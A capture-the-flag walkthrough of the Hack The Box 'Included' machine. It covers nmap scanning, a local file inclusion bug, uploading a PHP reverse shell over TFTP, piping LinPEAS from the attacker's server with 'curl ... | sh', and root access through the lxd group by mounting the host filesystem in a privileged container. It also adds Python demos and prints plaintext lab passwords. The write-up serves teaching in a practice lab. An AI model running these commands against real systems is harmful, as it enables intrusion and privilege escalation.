Included Walkthrough

After the Pathfinder walkthrough, here I am with Included, so... let's hack it and grab the flags.

As I mentioned before, the Starting Point machines are a series of nine easy-rated machines meant to be rooted in sequence. That means if you want to go through this box, you must first have completed Pathfinder.

Enough talk, 🥱 let's get it started 🐱‍💻

Disclaimer: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags! 🐱‍👤

00. Start Machine …

To start the machine, just click "Join Machine".

Then you can see the IP address for that machine. Usually it is 10.10.10.55 🤠

Before starting enumeration, we can simply ping the IP address to check our VPN connection and whether the machine is alive. Sometimes a machine's firewall drops ICMP echo requests, so a failed ping does not prove the host is down, but in most cases ping succeeds! 🙂

┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# ping 10.10.10.55 -c 2
PING 10.10.10.55 (10.10.10.55) 56(84) bytes of data.
64 bytes from 10.10.10.55: icmp_seq=1 ttl=63 time=297 ms
64 bytes from 10.10.10.55: icmp_seq=2 ttl=63 time=321 ms

--- 10.10.10.55 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 296.954/308.942/320.931/11.988 ms

The replies have TTL=63. Linux sends packets with a default TTL of 64 (Windows uses 128), and there is one hop between us and the machine (the VPN gateway) that decrements it by one, so 64 - 1 = 63 points to a Linux machine. Treat this as a fingerprinting hint rather than proof: the default TTL is a sysctl that an administrator can change.

01. Enumeration First …

01.1 Fast ports scan

As usual, run a fast Nmap scan of all TCP ports to identify which ones are open.

nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.55
-n      : Never do DNS resolution
-vv     : Extra verbosity
--open  : Show only open (or possibly open) ports
-p-     : All 65535 TCP ports
-T4     : Aggressive timing template; assumes you are on a reasonably fast and reliable network
-oN     : Save normal output to AllPorts.nmap

Note that this is a TCP-only scan. UDP services need a separate -sU scan, which, as we will see, matters on this box.

Here is the output πŸ‘‡

┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.55
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 13:26 EDT
Initiating Ping Scan at 13:26
Scanning 10.10.10.55 [4 ports]
Completed Ping Scan at 13:26, 0.29s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:26
Scanning 10.10.10.55 [65535 ports]
Discovered open port 80/tcp on 10.10.10.55
SYN Stealth Scan Timing: About 47.58% done; ETC: 13:28 (0:00:34 remaining)
Completed SYN Stealth Scan at 13:28, 64.20s elapsed (65535 total ports)
Nmap scan report for 10.10.10.55
Host is up, received reset ttl 63 (0.22s latency).
Scanned at 2021-05-24 13:26:58 EDT for 65s
Not shown: 65534 closed ports
Reason: 65534 resets
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 64.72 seconds
           Raw packets sent: 79376 (3.493MB) | Rcvd: 78517 (3.141MB)

So again we only have port 80 open (on TCP).

01.2 Run Nmap Scripting Engine

To get more detail, run service/version detection (-sV) and the default NSE scripts (-sC) against the open ports only. Since we already know which ports are open, restricting the scan to them keeps it fast.

┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# nmap -sV -sC -oN DetailPorts.nmap -p 80 10.10.10.55
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 13:29 EDT
Nmap scan report for 10.10.10.55
Host is up (0.28s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.10.55/?file=index.php

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.54 seconds

Only port 80 is open, serving Apache httpd 2.4.29 on Ubuntu, and the http-title script already hints at something interesting: the site redirects to /?file=index.php. Now you know what's next...

01.3 Discover more on port 80

Let's open a web browser and see what is served on port 80.

Looking at the URL (http://10.10.10.55/?file=index.php), the file parameter appears to name a file that the page includes, which suggests a local file inclusion / directory traversal vulnerability. So let's check it.

Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application. This might include application code and data, credentials for back-end systems, and sensitive operating system files. In some cases, an attacker might be able to write to arbitrary files on the server, allowing them to modify application data or behavior, and ultimately take full control of the server. (source: PortSwigger)

We can easily check this using Burp Suite's Repeater tab. Fire up Burp, proxy the browser through it, load the site again, send the request to Repeater and replace the file value with a path such as ../../../../etc/passwd.

As you can see, we have a directory traversal vulnerability, and because the parameter is fed to an include rather than a plain file read, any PHP file we can get onto the disk will be executed when we request it this way. So if we can upload a reverse shell script, we can call it through this vulnerability and get a shell. But how do we upload the reverse shell? I tried hard to find a way but I could not. 😥😥
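To make the bug concrete, here is an added example (not code from the box or from this writeup's author) that reproduces the logic behind ?file=index.php in Python so the traversal can be tried offline, and puts the hardened form next to it. The sandbox directory, the files in it, the web-root path and the allowlist are all constructed for the demo and are assumptions.

```python
"""Added example: an include()-style file resolver, vulnerable and hardened.

The box's web app hands the `file` parameter to a PHP include. The vulnerable
resolver below mimics that behaviour; the hardened one shows the usual fix, an
allowlist of page names plus a realpath containment check. A throwaway directory
stands in for the box's root filesystem (assumption)."""
import atexit
import os
import shutil
import tempfile

SANDBOX = tempfile.mkdtemp(prefix="lfi_demo_")      # fake "/" of the target box
atexit.register(shutil.rmtree, SANDBOX, True)
WEBROOT = "/var/www/html"                           # assumed web root on the box


def _host(box_path):
    """Map an absolute path on the imaginary box onto the sandbox on disk."""
    return os.path.join(SANDBOX, box_path.lstrip("/"))


# Constructed files: the page the app means to serve, and a juicy system file.
os.makedirs(_host(WEBROOT))
os.makedirs(_host("/etc"))
with open(_host(WEBROOT + "/index.php"), "w") as f:
    f.write("<?php echo 'home'; ?>\n")
with open(_host("/etc/passwd"), "w") as f:
    f.write("root:x:0:0:root:/root:/bin/bash\n"
            "tftp:x:110:115:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin\n")


def vulnerable_include(file_param):
    """Mimics include($_GET['file']) with no validation.

    A relative name is taken from the web root, '..' segments walk out of it,
    and an absolute name ignores the web root entirely: os.path.join drops
    everything before an absolute component, just as PHP would include the
    absolute path as given."""
    box_path = os.path.normpath(os.path.join(WEBROOT, file_param))
    with open(_host(box_path)) as f:
        return f.read()


ALLOWED_PAGES = {"index.php"}          # what the app actually intends to serve


def safe_resolve(file_param):
    """Return the on-disk path of a permitted page, or None if rejected.

    Two independent checks: an allowlist of page names, and a realpath
    containment check so that even a symlink under the web root cannot point
    outside it. Either alone stops '../../etc/passwd'; together they are
    defence in depth."""
    if file_param not in ALLOWED_PAGES:
        return None
    root = os.path.realpath(_host(WEBROOT))
    target = os.path.realpath(os.path.join(root, file_param))
    if not target.startswith(root + os.sep):
        return None
    return target


def hardened_include(file_param):
    """The fixed resolver: raises instead of serving anything outside the allowlist."""
    path = safe_resolve(file_param)
    if path is None:
        raise PermissionError("rejected: " + file_param)
    with open(path) as f:
        return f.read()


if __name__ == "__main__":
    for p in ("index.php", "../../../etc/passwd", "/etc/passwd"):
        print(f"vulnerable {p!r}: {vulnerable_include(p)!r}")
        print(f"hardened   {p!r}: {safe_resolve(p)}")
```

Both the relative traversal and the absolute path reach /etc/passwd through the vulnerable resolver, which is exactly why the box's ?file= parameter can later be pointed at a file dropped in the TFTP root; the hardened resolver returns None for both.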

Then I looked closely at all the users listed in /etc/passwd, read through the directory traversal vulnerability. You know what I found there? There is also a tftp user. Wait, what... how did we miss that port? 🤔🤔 Oh shoot! TFTP runs on UDP port 69, and our scans were TCP only.

Let's run Nmap again and check whether that port is alive.

┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# nmap -sU -p69 10.10.10.55
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 15:17 EDT
Nmap scan report for 10.10.10.55
Host is up (0.31s latency).

PORT   STATE         SERVICE
69/udp open|filtered tftp

Nmap done: 1 IP address (1 host up) scanned in 3.67 seconds

Yay!! The port answers. Note that Nmap reports open|filtered rather than open: UDP services often do not reply to an empty probe, so Nmap cannot tell an open port from one silently dropped by a firewall. The way to be sure is to talk to the service, so let's try to connect to it.

┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# tftp 10.10.10.55
tftp> ?
Commands may be abbreviated.  Commands are:

connect         connect to remote tftp
mode            set file transfer mode
put             send file
get             receive file
quit            exit tftp
verbose         toggle verbose mode
trace           toggle packet tracing
status          show current status
binary          set mode to octet
ascii           set mode to netascii
rexmt           set per-packet retransmission timeout
timeout         set total retransmission timeout
?               print help information

Yes, we can connect, and the client has a put command, so if the server allows writes we can upload files. Now we have an idea 💡💡. But how do we know the exact path where an uploaded file will be stored?

Again, /etc/passwd gives us a clue: the tftp service account's home directory is the TFTP root directory, which is where uploads land.

Fine! Now we know where the file will be located after uploading it over TFTP. 😋😋
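The two /etc/passwd checks above (spotting the tftp account, and reading its home directory to learn the upload root) can be turned into a repeatable triage step. The following is an added example, not code from the walkthrough: a small passwd(5) parser that separates real login accounts from service accounts and lists the service accounts whose home directory points at a real data directory. The passwd content is constructed for the demo (modelled on an Ubuntu box running tftpd-hpa) and the filtering thresholds are assumptions.

```python
"""Added example: parse /etc/passwd and triage the accounts in it."""

# Constructed sample, not the box's real file. The deliberately broken last
# line checks that the parser tolerates junk (e.g. a partially read file).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
mike:x:1000:1000:mike:/home/mike:/bin/bash
tftp:x:110:115:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin
broken line without enough fields
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}
# Homes that are placeholders rather than a directory a daemon stores data in.
PLACEHOLDER_HOMES = {"/", "/nonexistent", "/usr/sbin", "/bin", "/dev/null"}


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; malformed lines are skipped, not fatal."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            continue                    # not name:pw:uid:gid:gecos:home:shell
        name, _pw, uid, gid, gecos, home, shell = parts
        try:
            entries.append({"name": name, "uid": int(uid), "gid": int(gid),
                            "gecos": gecos, "home": home, "shell": shell})
        except ValueError:
            continue                    # non-numeric uid/gid: garbage line
    return entries


def interactive_users(entries):
    """Accounts worth a password guess: a real shell and UID 0 or >= 1000
    (Debian/Ubuntu allocate human users from 1000 upwards; assumption)."""
    return [e["name"] for e in entries
            if e["shell"] not in NOLOGIN_SHELLS
            and (e["uid"] == 0 or e["uid"] >= 1000)]


def service_accounts_with_dirs(entries):
    """Service accounts whose home is a real data directory.

    Each one hints at a daemon that may be listening and at where it keeps
    its files: tftp -> /var/lib/tftpboot is the TFTP root, www-data ->
    /var/www is the web tree. Runtime dirs under /run are ignored."""
    return {e["name"]: e["home"] for e in entries
            if e["shell"] in NOLOGIN_SHELLS
            and e["home"] not in PLACEHOLDER_HOMES
            and not e["home"].startswith("/run/")}


if __name__ == "__main__":
    users = parse_passwd(SAMPLE_PASSWD)
    print("login accounts:", interactive_users(users))
    for name, home in service_accounts_with_dirs(users).items():
        print(f"service account {name}: data directory {home}")
```

Run it against a copy of the real file pulled through the LFI and the tftp entry is the one that stands out, with its home directory giving the path to use in the next step.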

02. Foothold

First we need a PHP reverse shell. We can copy one from Kali's webshell directory (/usr/share/webshells/php/php-reverse-shell.php) or use this site.

After editing the $ip and $port values to point at your listener, copy the code into a file.

Now let's upload that file over TFTP, using the put command.

┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# tftp 10.10.10.55
tftp> put hidd3nwiki.php 👈
Sent 2708 bytes in 2.2 seconds

Then start a netcat listener on the port you put in the shell (nc -lvnp <port>) and request the uploaded file through the directory traversal vulnerability. The TFTP root is /var/lib/tftpboot, so the path is /var/lib/tftpboot/filename.php, i.e. http://10.10.10.55/?file=/var/lib/tftpboot/filename.php.
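What `tftp> put` actually does on the wire is a three-opcode exchange (RFC 1350 WRQ, DATA, ACK), and understanding it explains why an open TFTP write is so dangerous: there is no authentication at all, only the file name and the word "octet". The following is an added example, not from the original walkthrough: a minimal TFTP client plus a tiny write-only server standing in for the box's tftpd, run against each other on loopback so it works offline. The host, port, file name and payload are assumptions; a real tftpd-hpa listens on UDP 69 and only accepts new files when started with --create (otherwise the target file must already exist and be world-writable).

```python
"""Added example: a minimal RFC 1350 TFTP write, client and server, on loopback."""
import os
import socket
import struct
import tempfile
import threading

RRQ, WRQ, DATA, ACK, ERROR = 1, 2, 3, 4, 5   # RFC 1350 opcodes
BLOCK = 512                                   # fixed data block size


def tftp_put(host, port, filename, data, timeout=3.0):
    """Upload `data` as `filename`; returns the number of DATA blocks sent.

    The WRQ goes to the well-known port; the server answers ACK 0 from a fresh
    port (its transfer ID) and every DATA block is sent to that port. The
    transfer ends when a block shorter than 512 bytes is acknowledged, so a
    payload that is an exact multiple of 512 needs a trailing empty block."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(struct.pack("!H", WRQ) + filename.encode() + b"\x00octet\x00", (host, port))
    expected, offset, blocks, chunk = 0, 0, 0, None
    try:
        while True:
            pkt, peer = sock.recvfrom(516)
            opcode, num = struct.unpack("!HH", pkt[:4])
            if opcode == ERROR:
                msg = pkt[4:].rstrip(b"\x00").decode(errors="replace")
                raise RuntimeError("server error: " + msg)
            if opcode != ACK or num != expected:
                continue                       # duplicate or stray packet: keep waiting
            if chunk is not None and len(chunk) < BLOCK:
                return blocks                  # final short block acknowledged
            chunk = data[offset:offset + BLOCK]
            offset += len(chunk)
            expected += 1
            sock.sendto(struct.pack("!HH", DATA, expected) + chunk, peer)
            blocks += 1
    finally:
        sock.close()


def serve_one_put(listen_sock, root):
    """Minimal write-only server: handles one WRQ and stores the file under `root`.

    The name is flattened to its basename so a client cannot pick a directory
    (a simplification of tftpd-hpa's -s mode, which chroots into the root)."""
    pkt, client = listen_sock.recvfrom(516)
    opcode = struct.unpack("!H", pkt[:2])[0]
    if opcode != WRQ:
        listen_sock.sendto(struct.pack("!HH", ERROR, 4) + b"write requests only\x00", client)
        return None
    name = os.path.basename(pkt[2:].split(b"\x00")[0].decode(errors="replace"))
    xfer = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)   # new port = server TID
    xfer.settimeout(3.0)
    received, block = bytearray(), 1
    try:
        xfer.sendto(struct.pack("!HH", ACK, 0), client)
        while True:
            pkt, _ = xfer.recvfrom(516)
            opcode, num = struct.unpack("!HH", pkt[:4])
            if opcode != DATA or num != block:
                continue
            received += pkt[4:]
            xfer.sendto(struct.pack("!HH", ACK, num), client)
            block += 1
            if len(pkt) - 4 < BLOCK:
                break                          # short block: end of transfer
    finally:
        xfer.close()
    path = os.path.join(root, name)
    with open(path, "wb") as f:
        f.write(received)
    return path


def demo(payload=b"<?php phpinfo(); ?>\n", filename="hidd3nwiki.php"):
    """Run client and server on loopback; returns (blocks_sent, stored_path, intact)."""
    root = tempfile.mkdtemp(prefix="tftpboot_")      # stands in for /var/lib/tftpboot
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.settimeout(5.0)
    srv.bind(("127.0.0.1", 0))                        # unprivileged port instead of 69
    port = srv.getsockname()[1]
    result = {}
    t = threading.Thread(target=lambda: result.update(path=serve_one_put(srv, root)))
    t.start()
    try:
        blocks = tftp_put("127.0.0.1", port, filename, payload)
    finally:
        t.join()
        srv.close()
    with open(result["path"], "rb") as f:
        stored = f.read()
    return blocks, result["path"], stored == payload


if __name__ == "__main__":
    blocks, path, ok = demo()
    print(f"sent {blocks} block(s); stored at {path}; intact={ok}")
```

Nothing in the exchange identifies the client, which is why a TFTP root that is also reachable through the web server's include turns an "upload" into code execution.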

We successfully land a reverse shell as www-data. It's worth upgrading it to a proper TTY shell:

python3 -c "import pty; pty.spawn('/bin/bash')"

Looking around /home, there is a user called mike. Since all these boxes are connected together (passwords are reused between them), we can try the passwords we found in the Pathfinder walkthrough. Let's try su mike.

Yes! It works with the password Sheffield19, and we can grab the user flag. Now it's time for the root flag. 😎😎

03. Privilege Escalation

When it comes to privilege escalation, we can check things manually one by one, or run an enumeration script that does the searching for us. Since this is a Linux box, we can use LinPEAS.

First download the script to our attacking machine.

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

(The project has since moved to https://github.com/carlospolop/PEASS-ng, where linpeas.sh is published under Releases.)

Then run Python's built-in HTTP server to host the file from our end.

┌──(root💀hidd3nwiki)-[/home/…/Documents/HackTheBox/StartingPoints/Included]
└─# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Now we could wget the file onto the Included box, but instead of downloading it and running it, I pipe it straight from curl into sh, so nothing is written to the target's disk.

curl http://<YourIP>:8000/linpeas.sh | sh

Scrolling through the output, something interesting stands out. 👇

As you can see, mike is a member of the lxd group. That is effectively a root-equivalent group: members can talk to the LXD daemon's socket, and LXD will happily start a privileged container with the host's filesystem mounted inside it.

Here I found the lxd/lxc group privilege escalation article on HackTricks, and I'm going to follow the second method described there.

First, clone the following repository on your own host and build an Alpine image (build-alpine needs root privileges):

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

After build-alpine finishes, a tar.gz file is created. Its name (Alpine version, architecture and date) will differ from mine.

Now transfer it to the server: serve it with Python's HTTP server on our side and fetch it on the box with wget, as we did for LinPEAS.

Now follow the article again. The following commands import the image and create a privileged container from it. security.privileged=true means processes in the container run as real root on the host (no user-namespace mapping), which is what makes the next step work.

lxc image import ./alpine*.tar.gz --alias myimage
lxc init myimage mycontainer -c security.privileged=true

Next, mount the host's entire root filesystem (source=/) into the container at /mnt/root:

lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

Now Let's interact with the container.

lxc start mycontainer 
lxc exec mycontainer /bin/sh

As you can see, we land in a root shell inside the container, and because the host's filesystem is mounted at /mnt/root, we can grab root.txt from /mnt/root/root/ (the host's /root). Anything else on the host is readable and writable from here too.

04. Post Exploitation

As you can see, there is also a login.sql file in the /mnt/root/root directory. Let's open it.

It reveals credentials: Daniel : SNDv*2wzLWf. Keep them; passwords are reused across this series.

Okay... I'll see you on the next box! 🙋‍♂️🙋‍♂️

Find me on @twitter
